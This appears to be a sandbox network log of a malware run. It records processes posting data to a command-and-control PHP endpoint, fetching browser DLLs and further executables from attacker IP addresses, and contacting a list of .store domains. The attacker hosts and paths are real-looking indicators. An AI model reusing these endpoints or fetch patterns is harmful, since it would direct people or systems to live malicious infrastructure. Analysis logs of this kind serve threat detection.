MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAcJPExrntbO0YTULtOT+2sfyqIqSVwSTnWzPtwCiVlvTcw6WfiuxXFRxs+0wskiB9bkuyW7b1AXj/FOnT4Xuww81MQrV3wCBOYrpI+qV9tsbWk1i/Nk+cTyyjzXZIoWhfNqESRfUvVEM69QZVbFOlkVXwGSgWcCuwzhiEppEEVHJ1sQZt3G/KKXoPCGBR9id0PrS1Axo8b1mFXYA9+7/ZF9LT1MaufFk/1bT297kA++bgz8ODfKo+zfZMEjkhqpfX6yzuLhOJx9aAsk8yNlzT86fYs/RkAyx7MwP4cmiHr+UUwOCv+4hkI/UygYwcyrjceK7k+fx0TKrYfnVKb96c7sQZgAAEAArRkh0eCwy/tQ687XRFROAAV5ReHPFv7MzCDBKmvW9dmh5rR0RuCTwCxlTEUYdWmhgsJie9P1KmQ2M8hjvyTn8w+ZeoWx2LpER7h8xc0mYrMm4+UL5WuijOcFy19tB7jPvLZFVZltXjrnlsnotnfJXDnacTEiUvDQbHxYxgLeLwZ+dz+CYChp9wvMYoWkwXnKZ9/DjawOVdU65K/e+K/5DGmcSuBGzpleHuzBQwf8szqYFRz+Ko8hkBSlbOdEW3gss6VCgPsY4L4npbbftAsaWNhvvx2j0XOyMmk4O/VlESHAaUPadS+6rl/qznuQSkp3RPnAA01wfoomNB6UxBALwkVN79IeUvIU9E/rjBGK+sXoQ0oiv/3tDsHSOXPDRALuQ+EH560TpQAs1kJzaUamLNjghT4xDYaF6M2kybW2PWhXswjQMERdjeIyW4pMTy1kgJwndzmbod7DyOYTsiv5U8xMji35OBOeNwpoXCAPqSEnraZGoi8K/csZ80AR7RmT3/bizJiOJSc+Et1f69JuVq7cB&p=
Content-Length: 3400
Host: nw-umwatson.events.data.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 638
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Date: Thu, 07 Nov 2024 09:06:28 GMT
POST

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

msedge.exe

Remote address:

104.208.16.94:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
Content-Type: application/xml
User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAcJPExrntbO0YTULtOT+2sfyqIqSVwSTnWzPtwCiVlvTcw6WfiuxXFRxs+0wskiB9bkuyW7b1AXj/FOnT4Xuww81MQrV3wCBOYrpI+qV9tsbWk1i/Nk+cTyyjzXZIoWhfNqESRfUvVEM69QZVbFOlkVXwGSgWcCuwzhiEppEEVHJ1sQZt3G/KKXoPCGBR9id0PrS1Axo8b1mFXYA9+7/ZF9LT1MaufFk/1bT297kA++bgz8ODfKo+zfZMEjkhqpfX6yzuLhOJx9aAsk8yNlzT86fYs/RkAyx7MwP4cmiHr+UUwOCv+4hkI/UygYwcyrjceK7k+fx0TKrYfnVKb96c7sQZgAAEAArRkh0eCwy/tQ687XRFROAAV5ReHPFv7MzCDBKmvW9dmh5rR0RuCTwCxlTEUYdWmhgsJie9P1KmQ2M8hjvyTn8w+ZeoWx2LpER7h8xc0mYrMm4+UL5WuijOcFy19tB7jPvLZFVZltXjrnlsnotnfJXDnacTEiUvDQbHxYxgLeLwZ+dz+CYChp9wvMYoWkwXnKZ9/DjawOVdU65K/e+K/5DGmcSuBGzpleHuzBQwf8szqYFRz+Ko8hkBSlbOdEW3gss6VCgPsY4L4npbbftAsaWNhvvx2j0XOyMmk4O/VlESHAaUPadS+6rl/qznuQSkp3RPnAA01wfoomNB6UxBALwkVN79IeUvIU9E/rjBGK+sXoQ0oiv/3tDsHSOXPDRALuQ+EH560TpQAs1kJzaUamLNjghT4xDYaF6M2kybW2PWhXswjQMERdjeIyW4pMTy1kgJwndzmbod7DyOYTsiv5U8xMji35OBOeNwpoXCAPqSEnraZGoi8K/csZ80AR7RmT3/bizJiOJSc+Et1f69JuVq7cB&p=
Content-Length: 3400
Host: nw-umwatson.events.data.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 638
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Date: Thu, 07 Nov 2024 09:06:29 GMT
POST

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

msedge.exe

Remote address:

104.208.16.94:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
Content-Type: application/xml
User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
MSA_DeviceTicket: t=EwC4AlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAcJPExrntbO0YTULtOT+2sfyqIqSVwSTnWzPtwCiVlvTcw6WfiuxXFRxs+0wskiB9bkuyW7b1AXj/FOnT4Xuww81MQrV3wCBOYrpI+qV9tsbWk1i/Nk+cTyyjzXZIoWhfNqESRfUvVEM69QZVbFOlkVXwGSgWcCuwzhiEppEEVHJ1sQZt3G/KKXoPCGBR9id0PrS1Axo8b1mFXYA9+7/ZF9LT1MaufFk/1bT297kA++bgz8ODfKo+zfZMEjkhqpfX6yzuLhOJx9aAsk8yNlzT86fYs/RkAyx7MwP4cmiHr+UUwOCv+4hkI/UygYwcyrjceK7k+fx0TKrYfnVKb96c7sQZgAAEAArRkh0eCwy/tQ687XRFROAAV5ReHPFv7MzCDBKmvW9dmh5rR0RuCTwCxlTEUYdWmhgsJie9P1KmQ2M8hjvyTn8w+ZeoWx2LpER7h8xc0mYrMm4+UL5WuijOcFy19tB7jPvLZFVZltXjrnlsnotnfJXDnacTEiUvDQbHxYxgLeLwZ+dz+CYChp9wvMYoWkwXnKZ9/DjawOVdU65K/e+K/5DGmcSuBGzpleHuzBQwf8szqYFRz+Ko8hkBSlbOdEW3gss6VCgPsY4L4npbbftAsaWNhvvx2j0XOyMmk4O/VlESHAaUPadS+6rl/qznuQSkp3RPnAA01wfoomNB6UxBALwkVN79IeUvIU9E/rjBGK+sXoQ0oiv/3tDsHSOXPDRALuQ+EH560TpQAs1kJzaUamLNjghT4xDYaF6M2kybW2PWhXswjQMERdjeIyW4pMTy1kgJwndzmbod7DyOYTsiv5U8xMji35OBOeNwpoXCAPqSEnraZGoi8K/csZ80AR7RmT3/bizJiOJSc+Et1f69JuVq7cB&p=
Content-Length: 3400
Host: nw-umwatson.events.data.microsoft.com
DNS

94.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

94.16.208.104.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHJDGHIJDGCBAAAAAFIJ
Host: 185.215.113.206
Content-Length: 431
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCB
Host: 185.215.113.206
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.206/746f34465cf17784/freebl3.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/freebl3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://185.215.113.206/746f34465cf17784/mozglue.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/mozglue.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://185.215.113.206/746f34465cf17784/msvcp140.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/msvcp140.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://185.215.113.206/746f34465cf17784/nss3.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/nss3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://185.215.113.206/746f34465cf17784/softokn3.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/softokn3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://185.215.113.206/746f34465cf17784/vcruntime140.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/vcruntime140.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE
Host: 185.215.113.206
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE
Host: 185.215.113.206
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFH
Host: 185.215.113.206
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG
Host: 185.215.113.206
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK
Host: 185.215.113.206
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 68
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECGHIJDGCBKECAAKKEC
Host: 185.215.113.206
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.16/mine/random.exe

file.exe

Remote address:

185.215.113.16:80

Request

GET /mine/random.exe HTTP/1.1
Host: 185.215.113.16
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:36 GMT
Content-Type: application/octet-stream
Content-Length: 3220992
Last-Modified: Thu, 07 Nov 2024 09:03:29 GMT
Connection: keep-alive
ETag: "672c8261-312600"
Accept-Ranges: bytes
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.43/Zu7JuNko/index.php

skotes.exe

Remote address:

185.215.113.43:80

Request

POST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:43 GMT
Content-Type: application/octet-stream
Content-Length: 3185664
Last-Modified: Thu, 07 Nov 2024 09:03:08 GMT
Connection: keep-alive
ETag: "672c824c-309c00"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:47 GMT
Content-Type: application/octet-stream
Content-Length: 2142720
Last-Modified: Thu, 07 Nov 2024 09:03:21 GMT
Connection: keep-alive
ETag: "672c8259-20b200"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Nov 2024 09:06:55 GMT
Content-Type: application/octet-stream
Content-Length: 2722304
Last-Modified: Thu, 07 Nov 2024 08:55:24 GMT
Connection: keep-alive
ETag: "672c807c-298a00"
Accept-Ranges: bytes
DNS

43.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.113.215.185.in-addr.arpa

IN PTR

Response
DNS

presticitpo.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

presticitpo.store

IN A

Response
DNS

crisiwarny.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

crisiwarny.store

IN A

Response
DNS

fadehairucw.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

fadehairucw.store

IN A

Response
DNS

thumbystriw.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

thumbystriw.store

IN A

Response
DNS

necklacedmny.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

necklacedmny.store

IN A

Response
DNS

founpiuer.store

7134274202.exe

Remote address:

8.8.8.8:53

Request

founpiuer.store

IN A

Response

founpiuer.store

IN A

104.21.5.155

founpiuer.store

IN A

172.67.133.135
POST

https://founpiuer.store/api

7134274202.exe

Remote address:

104.21.5.155:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: founpiuer.store

Response

HTTP/1.1 403 Forbidden

Date: Thu, 07 Nov 2024 09:06:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iRqhxmOwRnLuBNsG9xNnJku%2FoXNXiIEWa482xwNS56pd4odZYhAwlBchgo1o7t7qAazPmYUEQjce9H95Gf2zetnH8QNP3QVlWFb1tVBTDbByspz%2BK9JojTzR9y3okPbuM4s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dec2b4e0db5bef0-LHR
POST

https://founpiuer.store/api

7134274202.exe

Remote address:

104.21.5.155:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=yBKFDFuTS1wjg7x7m2.FNx_833wjxJgOgqxi6RrjqnM-1730970406-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: founpiuer.store

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=er8h8td7pc4ai9vg98sntjldlj; expires=Mon, 03-Mar-2025 02:53:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2F6HGMWF0gta8f8KRYe1YDaYIyDNQq%2BzAzx40PwcobxhX9FVV8W0p3Sc8D2L6gpFk%2BgsPmnSUDoW95d8Cyi%2BA3FpVl9PLFik%2FEk4j0UFtaJfkpjRySY5N2U%2FAlBf3I%2FdgfQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dec2b4ede98bef0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=43422&sent=15&recv=13&lost=0&retrans=0&sent_bytes=8448&recv_bytes=1065&delivery_rate=261193&cwnd=257&unsent_bytes=0&cid=a0abd6d183eac392&ts=404&x=0"
DNS

155.5.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.5.21.104.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.206/

cddabe90fb.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

cddabe90fb.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:49 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.206/

skotes.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

skotes.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response

185.215.113.206:80

http://185.215.113.206/746f34465cf17784/sqlite3.dll

http

file.exe

49.4kB
1.2MB
847
841

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

200

HTTP Request

GET http://185.215.113.206/746f34465cf17784/sqlite3.dll

HTTP Response

200
142.250.180.4:443

www.google.com

tls, http2

chrome.exe

1.0kB
5.6kB
9
8
142.250.180.4:443

https://www.google.com/async/newtab_promos

tls, http2

chrome.exe

3.0kB
46.0kB
40
42

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos
142.250.180.4:443

www.google.com

tls

chrome.exe

980 B
4.6kB
9
7
142.250.200.42:443

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

chrome.exe

2.5kB
7.4kB
18
17

HTTP Request

OPTIONS https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

HTTP Request

POST https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
216.58.201.110:443

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0

tls, http2

chrome.exe

3.1kB
47.4kB
36
39

HTTP Request

GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0
172.217.16.238:443

https://play.google.com/log?format=json&hasfast=true

tls, http2

chrome.exe

3.6kB
8.9kB
15
15

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true
216.58.201.110:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1

tls, http2

chrome.exe

2.1kB
9.7kB
13
14

HTTP Request

